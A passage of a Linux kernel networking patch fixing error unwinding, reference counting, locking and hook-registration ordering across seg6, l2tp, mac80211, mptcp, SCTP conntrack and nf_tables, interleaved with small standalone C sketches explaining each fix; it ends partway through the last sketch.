+--- a/net/ipv6/seg6.c
++++ b/net/ipv6/seg6.c
+@@ -512,22 +512,24 @@ int __init seg6_init(void)
+ {
+ 	int err;
+ 
+-	err = genl_register_family(&seg6_genl_family);
++	err = register_pernet_subsys(&ip6_segments_ops);
+ 	if (err)
+ 		goto out;
+ 
+-	err = register_pernet_subsys(&ip6_segments_ops);
++	err = genl_register_family(&seg6_genl_family);
+ 	if (err)
+-		goto out_unregister_genl;
++		goto out_unregister_pernet;
+ 
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+ 	err = seg6_iptunnel_init();
+ 	if (err)
+-		goto out_unregister_pernet;
++		goto out_unregister_genl;
+ 
+ 	err = seg6_local_init();
+-	if (err)
+-		goto out_unregister_pernet;
++	if (err) {
++		seg6_iptunnel_exit();
++		goto out_unregister_genl;
++	}
+ #endif
+ 
+ #ifdef CONFIG_IPV6_SEG6_HMAC
+@@ -548,11 +550,11 @@ int __init seg6_init(void)
+ #endif
+ #endif
+ #ifdef CONFIG_IPV6_SEG6_LWTUNNEL
+-out_unregister_pernet:
+-	unregister_pernet_subsys(&ip6_segments_ops);
+-#endif
+ out_unregister_genl:
+ 	genl_unregister_family(&seg6_genl_family);
++#endif
++out_unregister_pernet:
++	unregister_pernet_subsys(&ip6_segments_ops);
+ 	goto out;
+ }
+ 
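
The reordered seg6_init() follows the usual rule for goto-based unwinding: undo only what actually succeeded, in reverse order of registration. A toy skeleton of the pattern; step_a, step_b and undo_a are invented:

#include <stdio.h>

static int step_a(void) { puts("A registered"); return 0; }
static int step_b(void) { puts("B registered"); return -1; } /* simulated failure */
static void undo_a(void) { puts("A unregistered"); }

int main(void)
{
	int err;

	err = step_a();
	if (err)
		goto out;

	err = step_b();
	if (err)
		goto out_undo_a;

	return 0;

out_undo_a:
	undo_a();	/* only A succeeded, so only A is undone */
out:
	return err;
}
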
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 314ec3a51e8de..bb92dc8b82f39 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -630,7 +630,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ back_from_confirm:
+ 	lock_sock(sk);
+-	ulen = len + skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0;
++	ulen = len + (skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0);
+ 	err = ip6_append_data(sk, ip_generic_getfrag, msg,
+ 			      ulen, transhdrlen, &ipc6,
+ 			      &fl6, (struct rt6_info *)dst,
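
The l2tp change is a pure operator-precedence fix: '+' binds tighter than '?:', so without the parentheses the whole of len is swallowed by the condition. A two-line demonstration:

#include <stdio.h>

int main(void)
{
	int len = 100, transhdrlen = 8;
	int empty = 1; /* skb_queue_empty() said the queue is empty */

	int buggy = len + empty ? transhdrlen : 0;	/* (len + empty) ? ... */
	int fixed = len + (empty ? transhdrlen : 0);

	printf("buggy=%d fixed=%d\n", buggy, fixed);	/* buggy=8 fixed=108 */
	return 0;
}
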
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index a2c4866080bd7..6cf0b77839d1d 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1775,6 +1775,8 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					      sband->band);
+ 	}
+ 
++	ieee80211_sta_set_rx_nss(link_sta);
++
+ 	return ret;
+ }
+ 
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index c6f0da028a2a4..f25dc6931a5b1 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -7294,6 +7294,7 @@ int ieee80211_mgd_deauth(struct ieee80211_sub_if_data *sdata,
+ 		ieee80211_report_disconnect(sdata, frame_buf,
+ 					    sizeof(frame_buf), true,
+ 					    req->reason_code, false);
++		drv_mgd_complete_tx(sdata->local, sdata, &info);
+ 		return 0;
+ 	}
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index f3d6c3e4c970e..bd56015b29258 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -891,6 +891,8 @@ static int sta_info_insert_finish(struct sta_info *sta) __acquires(RCU)
+ 	if (ieee80211_vif_is_mesh(&sdata->vif))
+ 		mesh_accept_plinks_update(sdata);
+ 
++	ieee80211_check_fast_xmit(sta);
++
+ 	return 0;
+  out_remove:
+ 	if (sta->sta.valid_links)
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 322a035f75929..3d62e8b718740 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -3044,7 +3044,7 @@ void ieee80211_check_fast_xmit(struct sta_info *sta)
+ 	    sdata->vif.type == NL80211_IFTYPE_STATION)
+ 		goto out;
+ 
+-	if (!test_sta_flag(sta, WLAN_STA_AUTHORIZED))
++	if (!test_sta_flag(sta, WLAN_STA_AUTHORIZED) || !sta->uploaded)
+ 		goto out;
+ 
+ 	if (test_sta_flag(sta, WLAN_STA_PS_STA) ||
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 68be8f2b622dd..256bf0b89e6ca 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -663,7 +663,7 @@ struct mctp_sk_key *mctp_alloc_local_tag(struct mctp_sock *msk,
+ 	spin_unlock_irqrestore(&mns->keys_lock, flags);
+ 
+ 	if (!tagbits) {
+-		kfree(key);
++		mctp_key_unref(key);
+ 		return ERR_PTR(-EBUSY);
+ 	}
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index a536586742f28..e57c5f47f0351 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -13,17 +13,19 @@
+ #include <uapi/linux/mptcp.h>
+ #include "protocol.h"
+ 
+-static int subflow_get_info(const struct sock *sk, struct sk_buff *skb)
++static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *sf;
+ 	struct nlattr *start;
+ 	u32 flags = 0;
++	bool slow;
+ 	int err;
+ 
+ 	start = nla_nest_start_noflag(skb, INET_ULP_INFO_MPTCP);
+ 	if (!start)
+ 		return -EMSGSIZE;
+ 
++	slow = lock_sock_fast(sk);
+ 	rcu_read_lock();
+ 	sf = rcu_dereference(inet_csk(sk)->icsk_ulp_data);
+ 	if (!sf) {
+@@ -69,11 +71,13 @@ static int subflow_get_info(const struct sock *sk, struct sk_buff *skb)
+ 	}
+ 
+ 	rcu_read_unlock();
++	unlock_sock_fast(sk, slow);
+ 	nla_nest_end(skb, start);
+ 	return 0;
+ 
+ nla_failure:
+ 	rcu_read_unlock();
++	unlock_sock_fast(sk, slow);
+ 	nla_nest_cancel(skb, start);
+ 	return err;
+ }
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 980050f6b456f..70a1025f093cf 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -900,7 +900,8 @@ static void __mptcp_pm_release_addr_entry(struct mptcp_pm_addr_entry *entry)
+ }
+ 
+ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+-					     struct mptcp_pm_addr_entry *entry)
++					     struct mptcp_pm_addr_entry *entry,
++					     bool needs_id)
+ {
+ 	struct mptcp_pm_addr_entry *cur, *del_entry = NULL;
+ 	unsigned int addr_max;
+@@ -942,7 +943,7 @@ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+ 		}
+ 	}
+ 
+-	if (!entry->addr.id) {
++	if (!entry->addr.id && needs_id) {
+ find_next:
+ 		entry->addr.id = find_next_zero_bit(pernet->id_bitmap,
+ 						    MPTCP_PM_MAX_ADDR_ID + 1,
+@@ -953,7 +954,7 @@ static int mptcp_pm_nl_append_new_local_addr(struct pm_nl_pernet *pernet,
+ 		}
+ 	}
+ 
+-	if (!entry->addr.id)
++	if (!entry->addr.id && needs_id)
+ 		goto out;
+ 
+ 	__set_bit(entry->addr.id, pernet->id_bitmap);
+@@ -1095,7 +1096,7 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	entry->ifindex = 0;
+ 	entry->flags = MPTCP_PM_ADDR_FLAG_IMPLICIT;
+ 	entry->lsk = NULL;
+-	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
++	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry, true);
+ 	if (ret < 0)
+ 		kfree(entry);
+ 
+@@ -1311,6 +1312,18 @@ static int mptcp_nl_add_subflow_or_signal_addr(struct net *net)
+ 	return 0;
+ }
+ 
++static bool mptcp_pm_has_addr_attr_id(const struct nlattr *attr,
++				      struct genl_info *info)
++{
++	struct nlattr *tb[MPTCP_PM_ADDR_ATTR_MAX + 1];
++
++	if (!nla_parse_nested_deprecated(tb, MPTCP_PM_ADDR_ATTR_MAX, attr,
++					 mptcp_pm_addr_policy, info->extack) &&
++	    tb[MPTCP_PM_ADDR_ATTR_ID])
++		return true;
++	return false;
++}
++
+ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *attr = info->attrs[MPTCP_PM_ATTR_ADDR];
+@@ -1352,7 +1365,8 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 			goto out_free;
+ 		}
+ 	}
+-	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry);
++	ret = mptcp_pm_nl_append_new_local_addr(pernet, entry,
++						!mptcp_pm_has_addr_attr_id(attr, info));
+ 	if (ret < 0) {
+ 		GENL_SET_ERR_MSG(info, "too many addresses or duplicate one");
+ 		goto out_free;
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 2e1e0d0e3ec60..631fa104617c3 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -25,8 +25,9 @@ void mptcp_free_local_addr_list(struct mptcp_sock *msk)
+ 	}
+ }
+ 
+-int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+-					     struct mptcp_pm_addr_entry *entry)
++static int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
++						    struct mptcp_pm_addr_entry *entry,
++						    bool needs_id)
+ {
+ 	DECLARE_BITMAP(id_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
+ 	struct mptcp_pm_addr_entry *match = NULL;
+@@ -41,7 +42,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_for_each_entry(e, &msk->pm.userspace_pm_local_addr_list, list) {
+ 		addr_match = mptcp_addresses_equal(&e->addr, &entry->addr, true);
+-		if (addr_match && entry->addr.id == 0)
++		if (addr_match && entry->addr.id == 0 && needs_id)
+ 			entry->addr.id = e->addr.id;
+ 		id_match = (e->addr.id == entry->addr.id);
+ 		if (addr_match && id_match) {
+@@ -64,7 +65,7 @@ int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+ 		}
+ 
+ 		*e = *entry;
+-		if (!e->addr.id)
++		if (!e->addr.id && needs_id)
+ 			e->addr.id = find_next_zero_bit(id_bitmap,
+ 							MPTCP_PM_MAX_ADDR_ID + 1,
+ 							1);
+@@ -155,7 +156,7 @@ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 	if (new_entry.addr.port == msk_sport)
+ 		new_entry.addr.port = 0;
+ 
+-	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry);
++	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry, true);
+ }
+ 
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+@@ -197,7 +198,7 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 		goto announce_err;
+ 	}
+ 
+-	err = mptcp_userspace_pm_append_new_local_addr(msk, &addr_val);
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &addr_val, false);
+ 	if (err < 0) {
+ 		GENL_SET_ERR_MSG(info, "did not match address and id");
+ 		goto announce_err;
+@@ -221,6 +222,40 @@ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ 	return err;
+ }
+ 
++static int mptcp_userspace_pm_remove_id_zero_address(struct mptcp_sock *msk,
++						     struct genl_info *info)
++{
++	struct mptcp_rm_list list = { .nr = 0 };
++	struct mptcp_subflow_context *subflow;
++	struct sock *sk = (struct sock *)msk;
++	bool has_id_0 = false;
++	int err = -EINVAL;
++
++	lock_sock(sk);
++	mptcp_for_each_subflow(msk, subflow) {
++		if (subflow->local_id == 0) {
++			has_id_0 = true;
++			break;
++		}
++	}
++	if (!has_id_0) {
++		GENL_SET_ERR_MSG(info, "address with id 0 not found");
++		goto remove_err;
++	}
++
++	list.ids[list.nr++] = 0;
++
++	spin_lock_bh(&msk->pm.lock);
++	mptcp_pm_remove_addr(msk, &list);
++	spin_unlock_bh(&msk->pm.lock);
++
++	err = 0;
++
++remove_err:
++	release_sock(sk);
++	return err;
++}
++
+ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+@@ -252,6 +287,11 @@ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info)
+ 		goto remove_err;
+ 	}
+ 
++	if (id_val == 0) {
++		err = mptcp_userspace_pm_remove_id_zero_address(msk, info);
++		goto remove_err;
++	}
++
+ 	lock_sock((struct sock *)msk);
+ 
+ 	list_for_each_entry(entry, &msk->pm.userspace_pm_local_addr_list, list) {
+@@ -335,7 +375,7 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	local.addr = addr_l;
+-	err = mptcp_userspace_pm_append_new_local_addr(msk, &local);
++	err = mptcp_userspace_pm_append_new_local_addr(msk, &local, false);
+ 	if (err < 0) {
+ 		GENL_SET_ERR_MSG(info, "did not match address and id");
+ 		goto create_err;
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 259672cc344f3..b092205213234 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -834,8 +834,6 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+ 
+-int mptcp_userspace_pm_append_new_local_addr(struct mptcp_sock *msk,
+-					     struct mptcp_pm_addr_entry *entry);
+ void mptcp_free_local_addr_list(struct mptcp_sock *msk);
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info);
+ int mptcp_nl_cmd_remove(struct sk_buff *skb, struct genl_info *info);
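
The mptcp hunks above make automatic ID assignment opt-in: only the get_local_id path passes needs_id=true, so an address announced or used for a subflow with an explicit id of 0 keeps that id instead of having one picked for it. What follows is a minimal standalone sketch of that contract, not kernel code; the array-backed list, the linear ID scan and the names are simplified stand-ins for the real locked list and ID bitmap.

/* Standalone sketch (not kernel code) of the needs_id contract above.
 * Types are simplified stand-ins; the real code walks
 * msk->pm.userspace_pm_local_addr_list under the pm lock and allocates
 * IDs from a bitmap.
 */
#include <stdbool.h>
#include <stdio.h>

struct addr_entry {
	int id;		/* 0 means "no ID chosen yet" */
	int addr;	/* stand-in for the real IP address */
};

/* Append an address; assign a fresh ID only when the caller asks for
 * one (needs_id).  Callers handling user-supplied entries (announce,
 * subflow create) pass false so an explicit ID of 0 is kept as-is.
 */
static int append_new_local_addr(struct addr_entry *list, int *nr,
				 struct addr_entry *entry, bool needs_id)
{
	int next_id = 1;

	for (int i = 0; i < *nr; i++) {
		bool addr_match = list[i].addr == entry->addr;

		if (addr_match && entry->id == 0 && needs_id)
			entry->id = list[i].id;	/* reuse the known ID */
		if (addr_match && list[i].id == entry->id)
			return entry->id;	/* already present */
		if (list[i].id >= next_id)
			next_id = list[i].id + 1;
	}

	if (entry->id == 0 && needs_id)
		entry->id = next_id;		/* auto-assign */

	list[(*nr)++] = *entry;
	return entry->id;
}

int main(void)
{
	struct addr_entry list[8];
	int nr = 0;

	struct addr_entry a = { .id = 0, .addr = 42 };
	/* get_local_id path: an ID is required, so 0 gets replaced. */
	printf("auto id: %d\n", append_new_local_addr(list, &nr, &a, true));

	struct addr_entry b = { .id = 0, .addr = 43 };
	/* announce path: the user chose ID 0 on purpose; keep it. */
	printf("kept id: %d\n", append_new_local_addr(list, &nr, &b, false));
	return 0;
}
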
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index c94a9971d790c..7ffd698497f2a 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -299,7 +299,7 @@ sctp_new(struct nf_conn *ct, const struct sk_buff *skb,
+ 			pr_debug("Setting vtag %x for secondary conntrack\n",
+ 				 sh->vtag);
+ 			ct->proto.sctp.vtag[IP_CT_DIR_ORIGINAL] = sh->vtag;
+-		} else {
++		} else if (sch->type == SCTP_CID_SHUTDOWN_ACK) {
+ 		/* If it is a shutdown ack OOTB packet, we expect a return
+ 		   shutdown complete, otherwise an ABORT Sec 8.4 (5) and (8) */
+ 			pr_debug("Setting vtag %x for new conn OOTB\n",
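
The sctp_new() change above narrows the former catch-all else: only an out-of-the-blue SHUTDOWN_ACK should prime the fresh conntrack entry with the packet's verification tag, since a SHUTDOWN_COMPLETE is then expected in the reverse direction (Sec 8.4 (5) and (8) of the SCTP RFC); other chunk types no longer take that branch. A standalone sketch of the narrowed dispatch, with simplified names and return codes:

/* Standalone sketch (not kernel code) of the narrowed OOTB case above:
 * chunk type values match the SCTP chunk IDs, everything else is a
 * simplified stand-in for the conntrack state.
 */
#include <stdint.h>
#include <stdio.h>

enum { CID_DATA = 0, CID_INIT = 1, CID_SHUTDOWN_ACK = 8 };

static int prime_vtag(uint8_t chunk_type, uint32_t vtag, uint32_t *dir_vtag)
{
	if (chunk_type == CID_INIT) {
		*dir_vtag = vtag;	/* normal connection setup */
		return 1;
	} else if (chunk_type == CID_SHUTDOWN_ACK) {
		*dir_vtag = vtag;	/* OOTB: expect SHUTDOWN_COMPLETE */
		return 1;
	}
	return 0;	/* the old unconditional 'else' caught these too */
}

int main(void)
{
	uint32_t vtag = 0;

	printf("DATA primes vtag? %d\n",
	       prime_vtag(CID_DATA, 0xabcd, &vtag));
	printf("SHUTDOWN_ACK primes vtag? %d\n",
	       prime_vtag(CID_SHUTDOWN_ACK, 0xabcd, &vtag));
	return 0;
}
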
+diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
+index c1d99cb370b44..99195cf6b2657 100644
+--- a/net/netfilter/nf_flow_table_core.c
++++ b/net/netfilter/nf_flow_table_core.c
+@@ -87,12 +87,22 @@ static u32 flow_offload_dst_cookie(struct flow_offload_tuple *flow_tuple)
+ 	return 0;
+ }
+ 
++static struct dst_entry *nft_route_dst_fetch(struct nf_flow_route *route,
++					     enum flow_offload_tuple_dir dir)
++{
++	struct dst_entry *dst = route->tuple[dir].dst;
++
++	route->tuple[dir].dst = NULL;
++
++	return dst;
++}
++
+ static int flow_offload_fill_route(struct flow_offload *flow,
+-				   const struct nf_flow_route *route,
++				   struct nf_flow_route *route,
+ 				   enum flow_offload_tuple_dir dir)
+ {
+ 	struct flow_offload_tuple *flow_tuple = &flow->tuplehash[dir].tuple;
+-	struct dst_entry *dst = route->tuple[dir].dst;
++	struct dst_entry *dst = nft_route_dst_fetch(route, dir);
+ 	int i, j = 0;
+ 
+ 	switch (flow_tuple->l3proto) {
+@@ -122,12 +132,10 @@ static int flow_offload_fill_route(struct flow_offload *flow,
+ 		       ETH_ALEN);
+ 		flow_tuple->out.ifidx = route->tuple[dir].out.ifindex;
+ 		flow_tuple->out.hw_ifidx = route->tuple[dir].out.hw_ifindex;
++		dst_release(dst);
+ 		break;
+ 	case FLOW_OFFLOAD_XMIT_XFRM:
+ 	case FLOW_OFFLOAD_XMIT_NEIGH:
+-		if (!dst_hold_safe(route->tuple[dir].dst))
+-			return -1;
+-
+ 		flow_tuple->dst_cache = dst;
+ 		flow_tuple->dst_cookie = flow_offload_dst_cookie(flow_tuple);
+ 		break;
+@@ -148,27 +156,12 @@ static void nft_flow_dst_release(struct flow_offload *flow,
+ 		dst_release(flow->tuplehash[dir].tuple.dst_cache);
+ }
+ 
+-int flow_offload_route_init(struct flow_offload *flow,
+-			    const struct nf_flow_route *route)
++void flow_offload_route_init(struct flow_offload *flow,
++			     struct nf_flow_route *route)
+ {
+-	int err;
+-
+-	err = flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_ORIGINAL);
+-	if (err < 0)
+-		return err;
+-
+-	err = flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_REPLY);
+-	if (err < 0)
+-		goto err_route_reply;
+-
++	flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_ORIGINAL);
++	flow_offload_fill_route(flow, route, FLOW_OFFLOAD_DIR_REPLY);
+ 	flow->type = NF_FLOW_OFFLOAD_ROUTE;
+-
+-	return 0;
+-
+-err_route_reply:
+-	nft_flow_dst_release(flow, FLOW_OFFLOAD_DIR_ORIGINAL);
+-
+-	return err;
+ }
+ EXPORT_SYMBOL_GPL(flow_offload_route_init);
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 49acb89ba9c56..e21ec3ad80939 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -686,15 +686,16 @@ static int nft_delobj(struct nft_ctx *ctx, struct nft_object *obj)
+ 	return err;
+ }
+ 
+-static int nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
+-				   struct nft_flowtable *flowtable)
++static struct nft_trans *
++nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
++		        struct nft_flowtable *flowtable)
+ {
+ 	struct nft_trans *trans;
+ 
+ 	trans = nft_trans_alloc(ctx, msg_type,
+ 				sizeof(struct nft_trans_flowtable));
+ 	if (trans == NULL)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (msg_type == NFT_MSG_NEWFLOWTABLE)
+ 		nft_activate_next(ctx->net, flowtable);
+@@ -703,22 +704,22 @@ static int nft_trans_flowtable_add(struct nft_ctx *ctx, int msg_type,
+ 	nft_trans_flowtable(trans) = flowtable;
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
+ 
+-	return 0;
++	return trans;
+ }
+ 
+ static int nft_delflowtable(struct nft_ctx *ctx,
+ 			    struct nft_flowtable *flowtable)
+ {
+-	int err;
++	struct nft_trans *trans;
+ 
+-	err = nft_trans_flowtable_add(ctx, NFT_MSG_DELFLOWTABLE, flowtable);
+-	if (err < 0)
+-		return err;
++	trans = nft_trans_flowtable_add(ctx, NFT_MSG_DELFLOWTABLE, flowtable);
++	if (IS_ERR(trans))
++		return PTR_ERR(trans);
+ 
+ 	nft_deactivate_next(ctx->net, flowtable);
+ 	nft_use_dec(&ctx->table->use);
+ 
+-	return err;
++	return 0;
+ }
+ 
+ static void __nft_reg_track_clobber(struct nft_regs_track *track, u8 dreg)
+@@ -1245,6 +1246,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	return 0;
+ 
+ err_register_hooks:
++	ctx->table->flags |= NFT_TABLE_F_DORMANT;
+ 	nft_trans_destroy(trans);
+ 	return ret;
+ }
+@@ -2057,7 +2059,7 @@ static struct nft_hook *nft_netdev_hook_alloc(struct net *net,
+ 	struct nft_hook *hook;
+ 	int err;
+ 
+-	hook = kmalloc(sizeof(struct nft_hook), GFP_KERNEL_ACCOUNT);
++	hook = kzalloc(sizeof(struct nft_hook), GFP_KERNEL_ACCOUNT);
+ 	if (!hook) {
+ 		err = -ENOMEM;
+ 		goto err_hook_alloc;
+@@ -2458,19 +2460,15 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 	RCU_INIT_POINTER(chain->blob_gen_0, blob);
+ 	RCU_INIT_POINTER(chain->blob_gen_1, blob);
+ 
+-	err = nf_tables_register_hook(net, table, chain);
+-	if (err < 0)
+-		goto err_destroy_chain;
+-
+ 	if (!nft_use_inc(&table->use)) {
+ 		err = -EMFILE;
+-		goto err_use;
++		goto err_destroy_chain;
+ 	}
+ 
+ 	trans = nft_trans_chain_add(ctx, NFT_MSG_NEWCHAIN);
+ 	if (IS_ERR(trans)) {
+ 		err = PTR_ERR(trans);
+-		goto err_unregister_hook;
++		goto err_trans;
+ 	}
+ 
+ 	nft_trans_chain_policy(trans) = NFT_CHAIN_POLICY_UNSET;
+@@ -2478,17 +2476,22 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		nft_trans_chain_policy(trans) = policy;
+ 
+ 	err = nft_chain_add(table, chain);
+-	if (err < 0) {
+-		nft_trans_destroy(trans);
+-		goto err_unregister_hook;
+-	}
++	if (err < 0)
++		goto err_chain_add;
++
++	/* This must be LAST to ensure no packets are walking over this chain. */
++	err = nf_tables_register_hook(net, table, chain);
++	if (err < 0)
++		goto err_register_hook;
+ 
+ 	return 0;
+ 
+-err_unregister_hook:
++err_register_hook:
++	nft_chain_del(chain);
++err_chain_add:
++	nft_trans_destroy(trans);
++err_trans:
+ 	nft_use_dec_restore(&table->use);
+-err_use:
+-	nf_tables_unregister_hook(net, table, chain);
+ err_destroy_chain:
+ 	nf_tables_chain_destroy(ctx);
+ 
+@@ -7937,7 +7940,7 @@ static int nft_register_flowtable_net_hooks(struct net *net,
+ 	return err;
+ }
+ 
+-static void nft_flowtable_hooks_destroy(struct list_head *hook_list)
++static void nft_hooks_destroy(struct list_head *hook_list)
+ {
+ 	struct nft_hook *hook, *next;
+ 
+@@ -8030,9 +8033,9 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	u8 family = info->nfmsg->nfgen_family;
+ 	const struct nf_flowtable_type *type;
+ 	struct nft_flowtable *flowtable;
+-	struct nft_hook *hook, *next;
+ 	struct net *net = info->net;
+ 	struct nft_table *table;
++	struct nft_trans *trans;
+ 	struct nft_ctx ctx;
+ 	int err;
+ 
+@@ -8112,34 +8115,34 @@ static int nf_tables_newflowtable(struct sk_buff *skb,
+ 	err = nft_flowtable_parse_hook(&ctx, nla[NFTA_FLOWTABLE_HOOK],
+ 				       &flowtable_hook, flowtable, true);
+ 	if (err < 0)
+-		goto err4;
++		goto err_flowtable_parse_hooks;
+ 
+ 	list_splice(&flowtable_hook.list, &flowtable->hook_list);
+ 	flowtable->data.priority = flowtable_hook.priority;
+ 	flowtable->hooknum = flowtable_hook.num;
+ 
++	trans = nft_trans_flowtable_add(&ctx, NFT_MSG_NEWFLOWTABLE, flowtable);
++	if (IS_ERR(trans)) {
++		err = PTR_ERR(trans);
++		goto err_flowtable_trans;
++	}
++
++	/* This must be LAST to ensure no packets are walking over this flowtable. */
+ 	err = nft_register_flowtable_net_hooks(ctx.net, table,
+ 					       &flowtable->hook_list,
+ 					       flowtable);
+-	if (err < 0) {
+-		nft_flowtable_hooks_destroy(&flowtable->hook_list);
+-		goto err4;
+-	}
+-
+-	err = nft_trans_flowtable_add(&ctx, NFT_MSG_NEWFLOWTABLE, flowtable);
+ 	if (err < 0)
+-		goto err5;
++		goto err_flowtable_hooks;
+ 
+ 	list_add_tail_rcu(&flowtable->list, &table->flowtables);
+ 
+ 	return 0;
+-err5:
+-	list_for_each_entry_safe(hook, next, &flowtable->hook_list, list) {
+-		nft_unregister_flowtable_hook(net, flowtable, hook);
+-		list_del_rcu(&hook->list);
+-		kfree_rcu(hook, rcu);
+-	}
+-err4:
++
++err_flowtable_hooks:
++	nft_trans_destroy(trans);
++err_flowtable_trans:
++	nft_hooks_destroy(&flowtable->hook_list);
++err_flowtable_parse_hooks:
+ 	flowtable->data.type->free(&flowtable->data);
+ err3:
+ 	module_put(type->owner);
+@@ -8892,7 +8895,7 @@ static void nft_commit_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_DELFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
+@@ -9849,7 +9852,7 @@ static void nf_tables_abort_release(struct nft_trans *trans)
+ 		break;
+ 	case NFT_MSG_NEWFLOWTABLE:
+ 		if (nft_trans_flowtable_update(trans))
+-			nft_flowtable_hooks_destroy(&nft_trans_flowtable_hooks(trans));
++			nft_hooks_destroy(&nft_trans_flowtable_hooks(trans));
+ 		else
+ 			nf_tables_flowtable_destroy(nft_trans_flowtable(trans));
+ 		break;
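
Both the addchain and newflowtable paths above are reordered so that hook registration, the step that makes the new object visible to packets, happens strictly last, and the error labels unwind the completed steps in exact reverse order. A standalone sketch of that construct-then-publish shape (toy step functions, nothing kernel-specific):

/* Standalone sketch (not kernel code) of the "publish last, unwind in
 * reverse" ordering adopted above: the hook is registered only after
 * every other step succeeded, and each label undoes exactly the steps
 * completed before the failure.
 */
#include <stdio.h>

static int step_alloc(void)          { return 0; }
static void undo_alloc(void)         { puts("undo alloc"); }
static int step_link(void)           { return 0; }
static void undo_link(void)          { puts("undo link"); }
static int step_register_hook(void)  { return -1; /* simulate failure */ }

static int create_object(void)
{
	int err;

	err = step_alloc();
	if (err)
		goto err_alloc;

	err = step_link();
	if (err)
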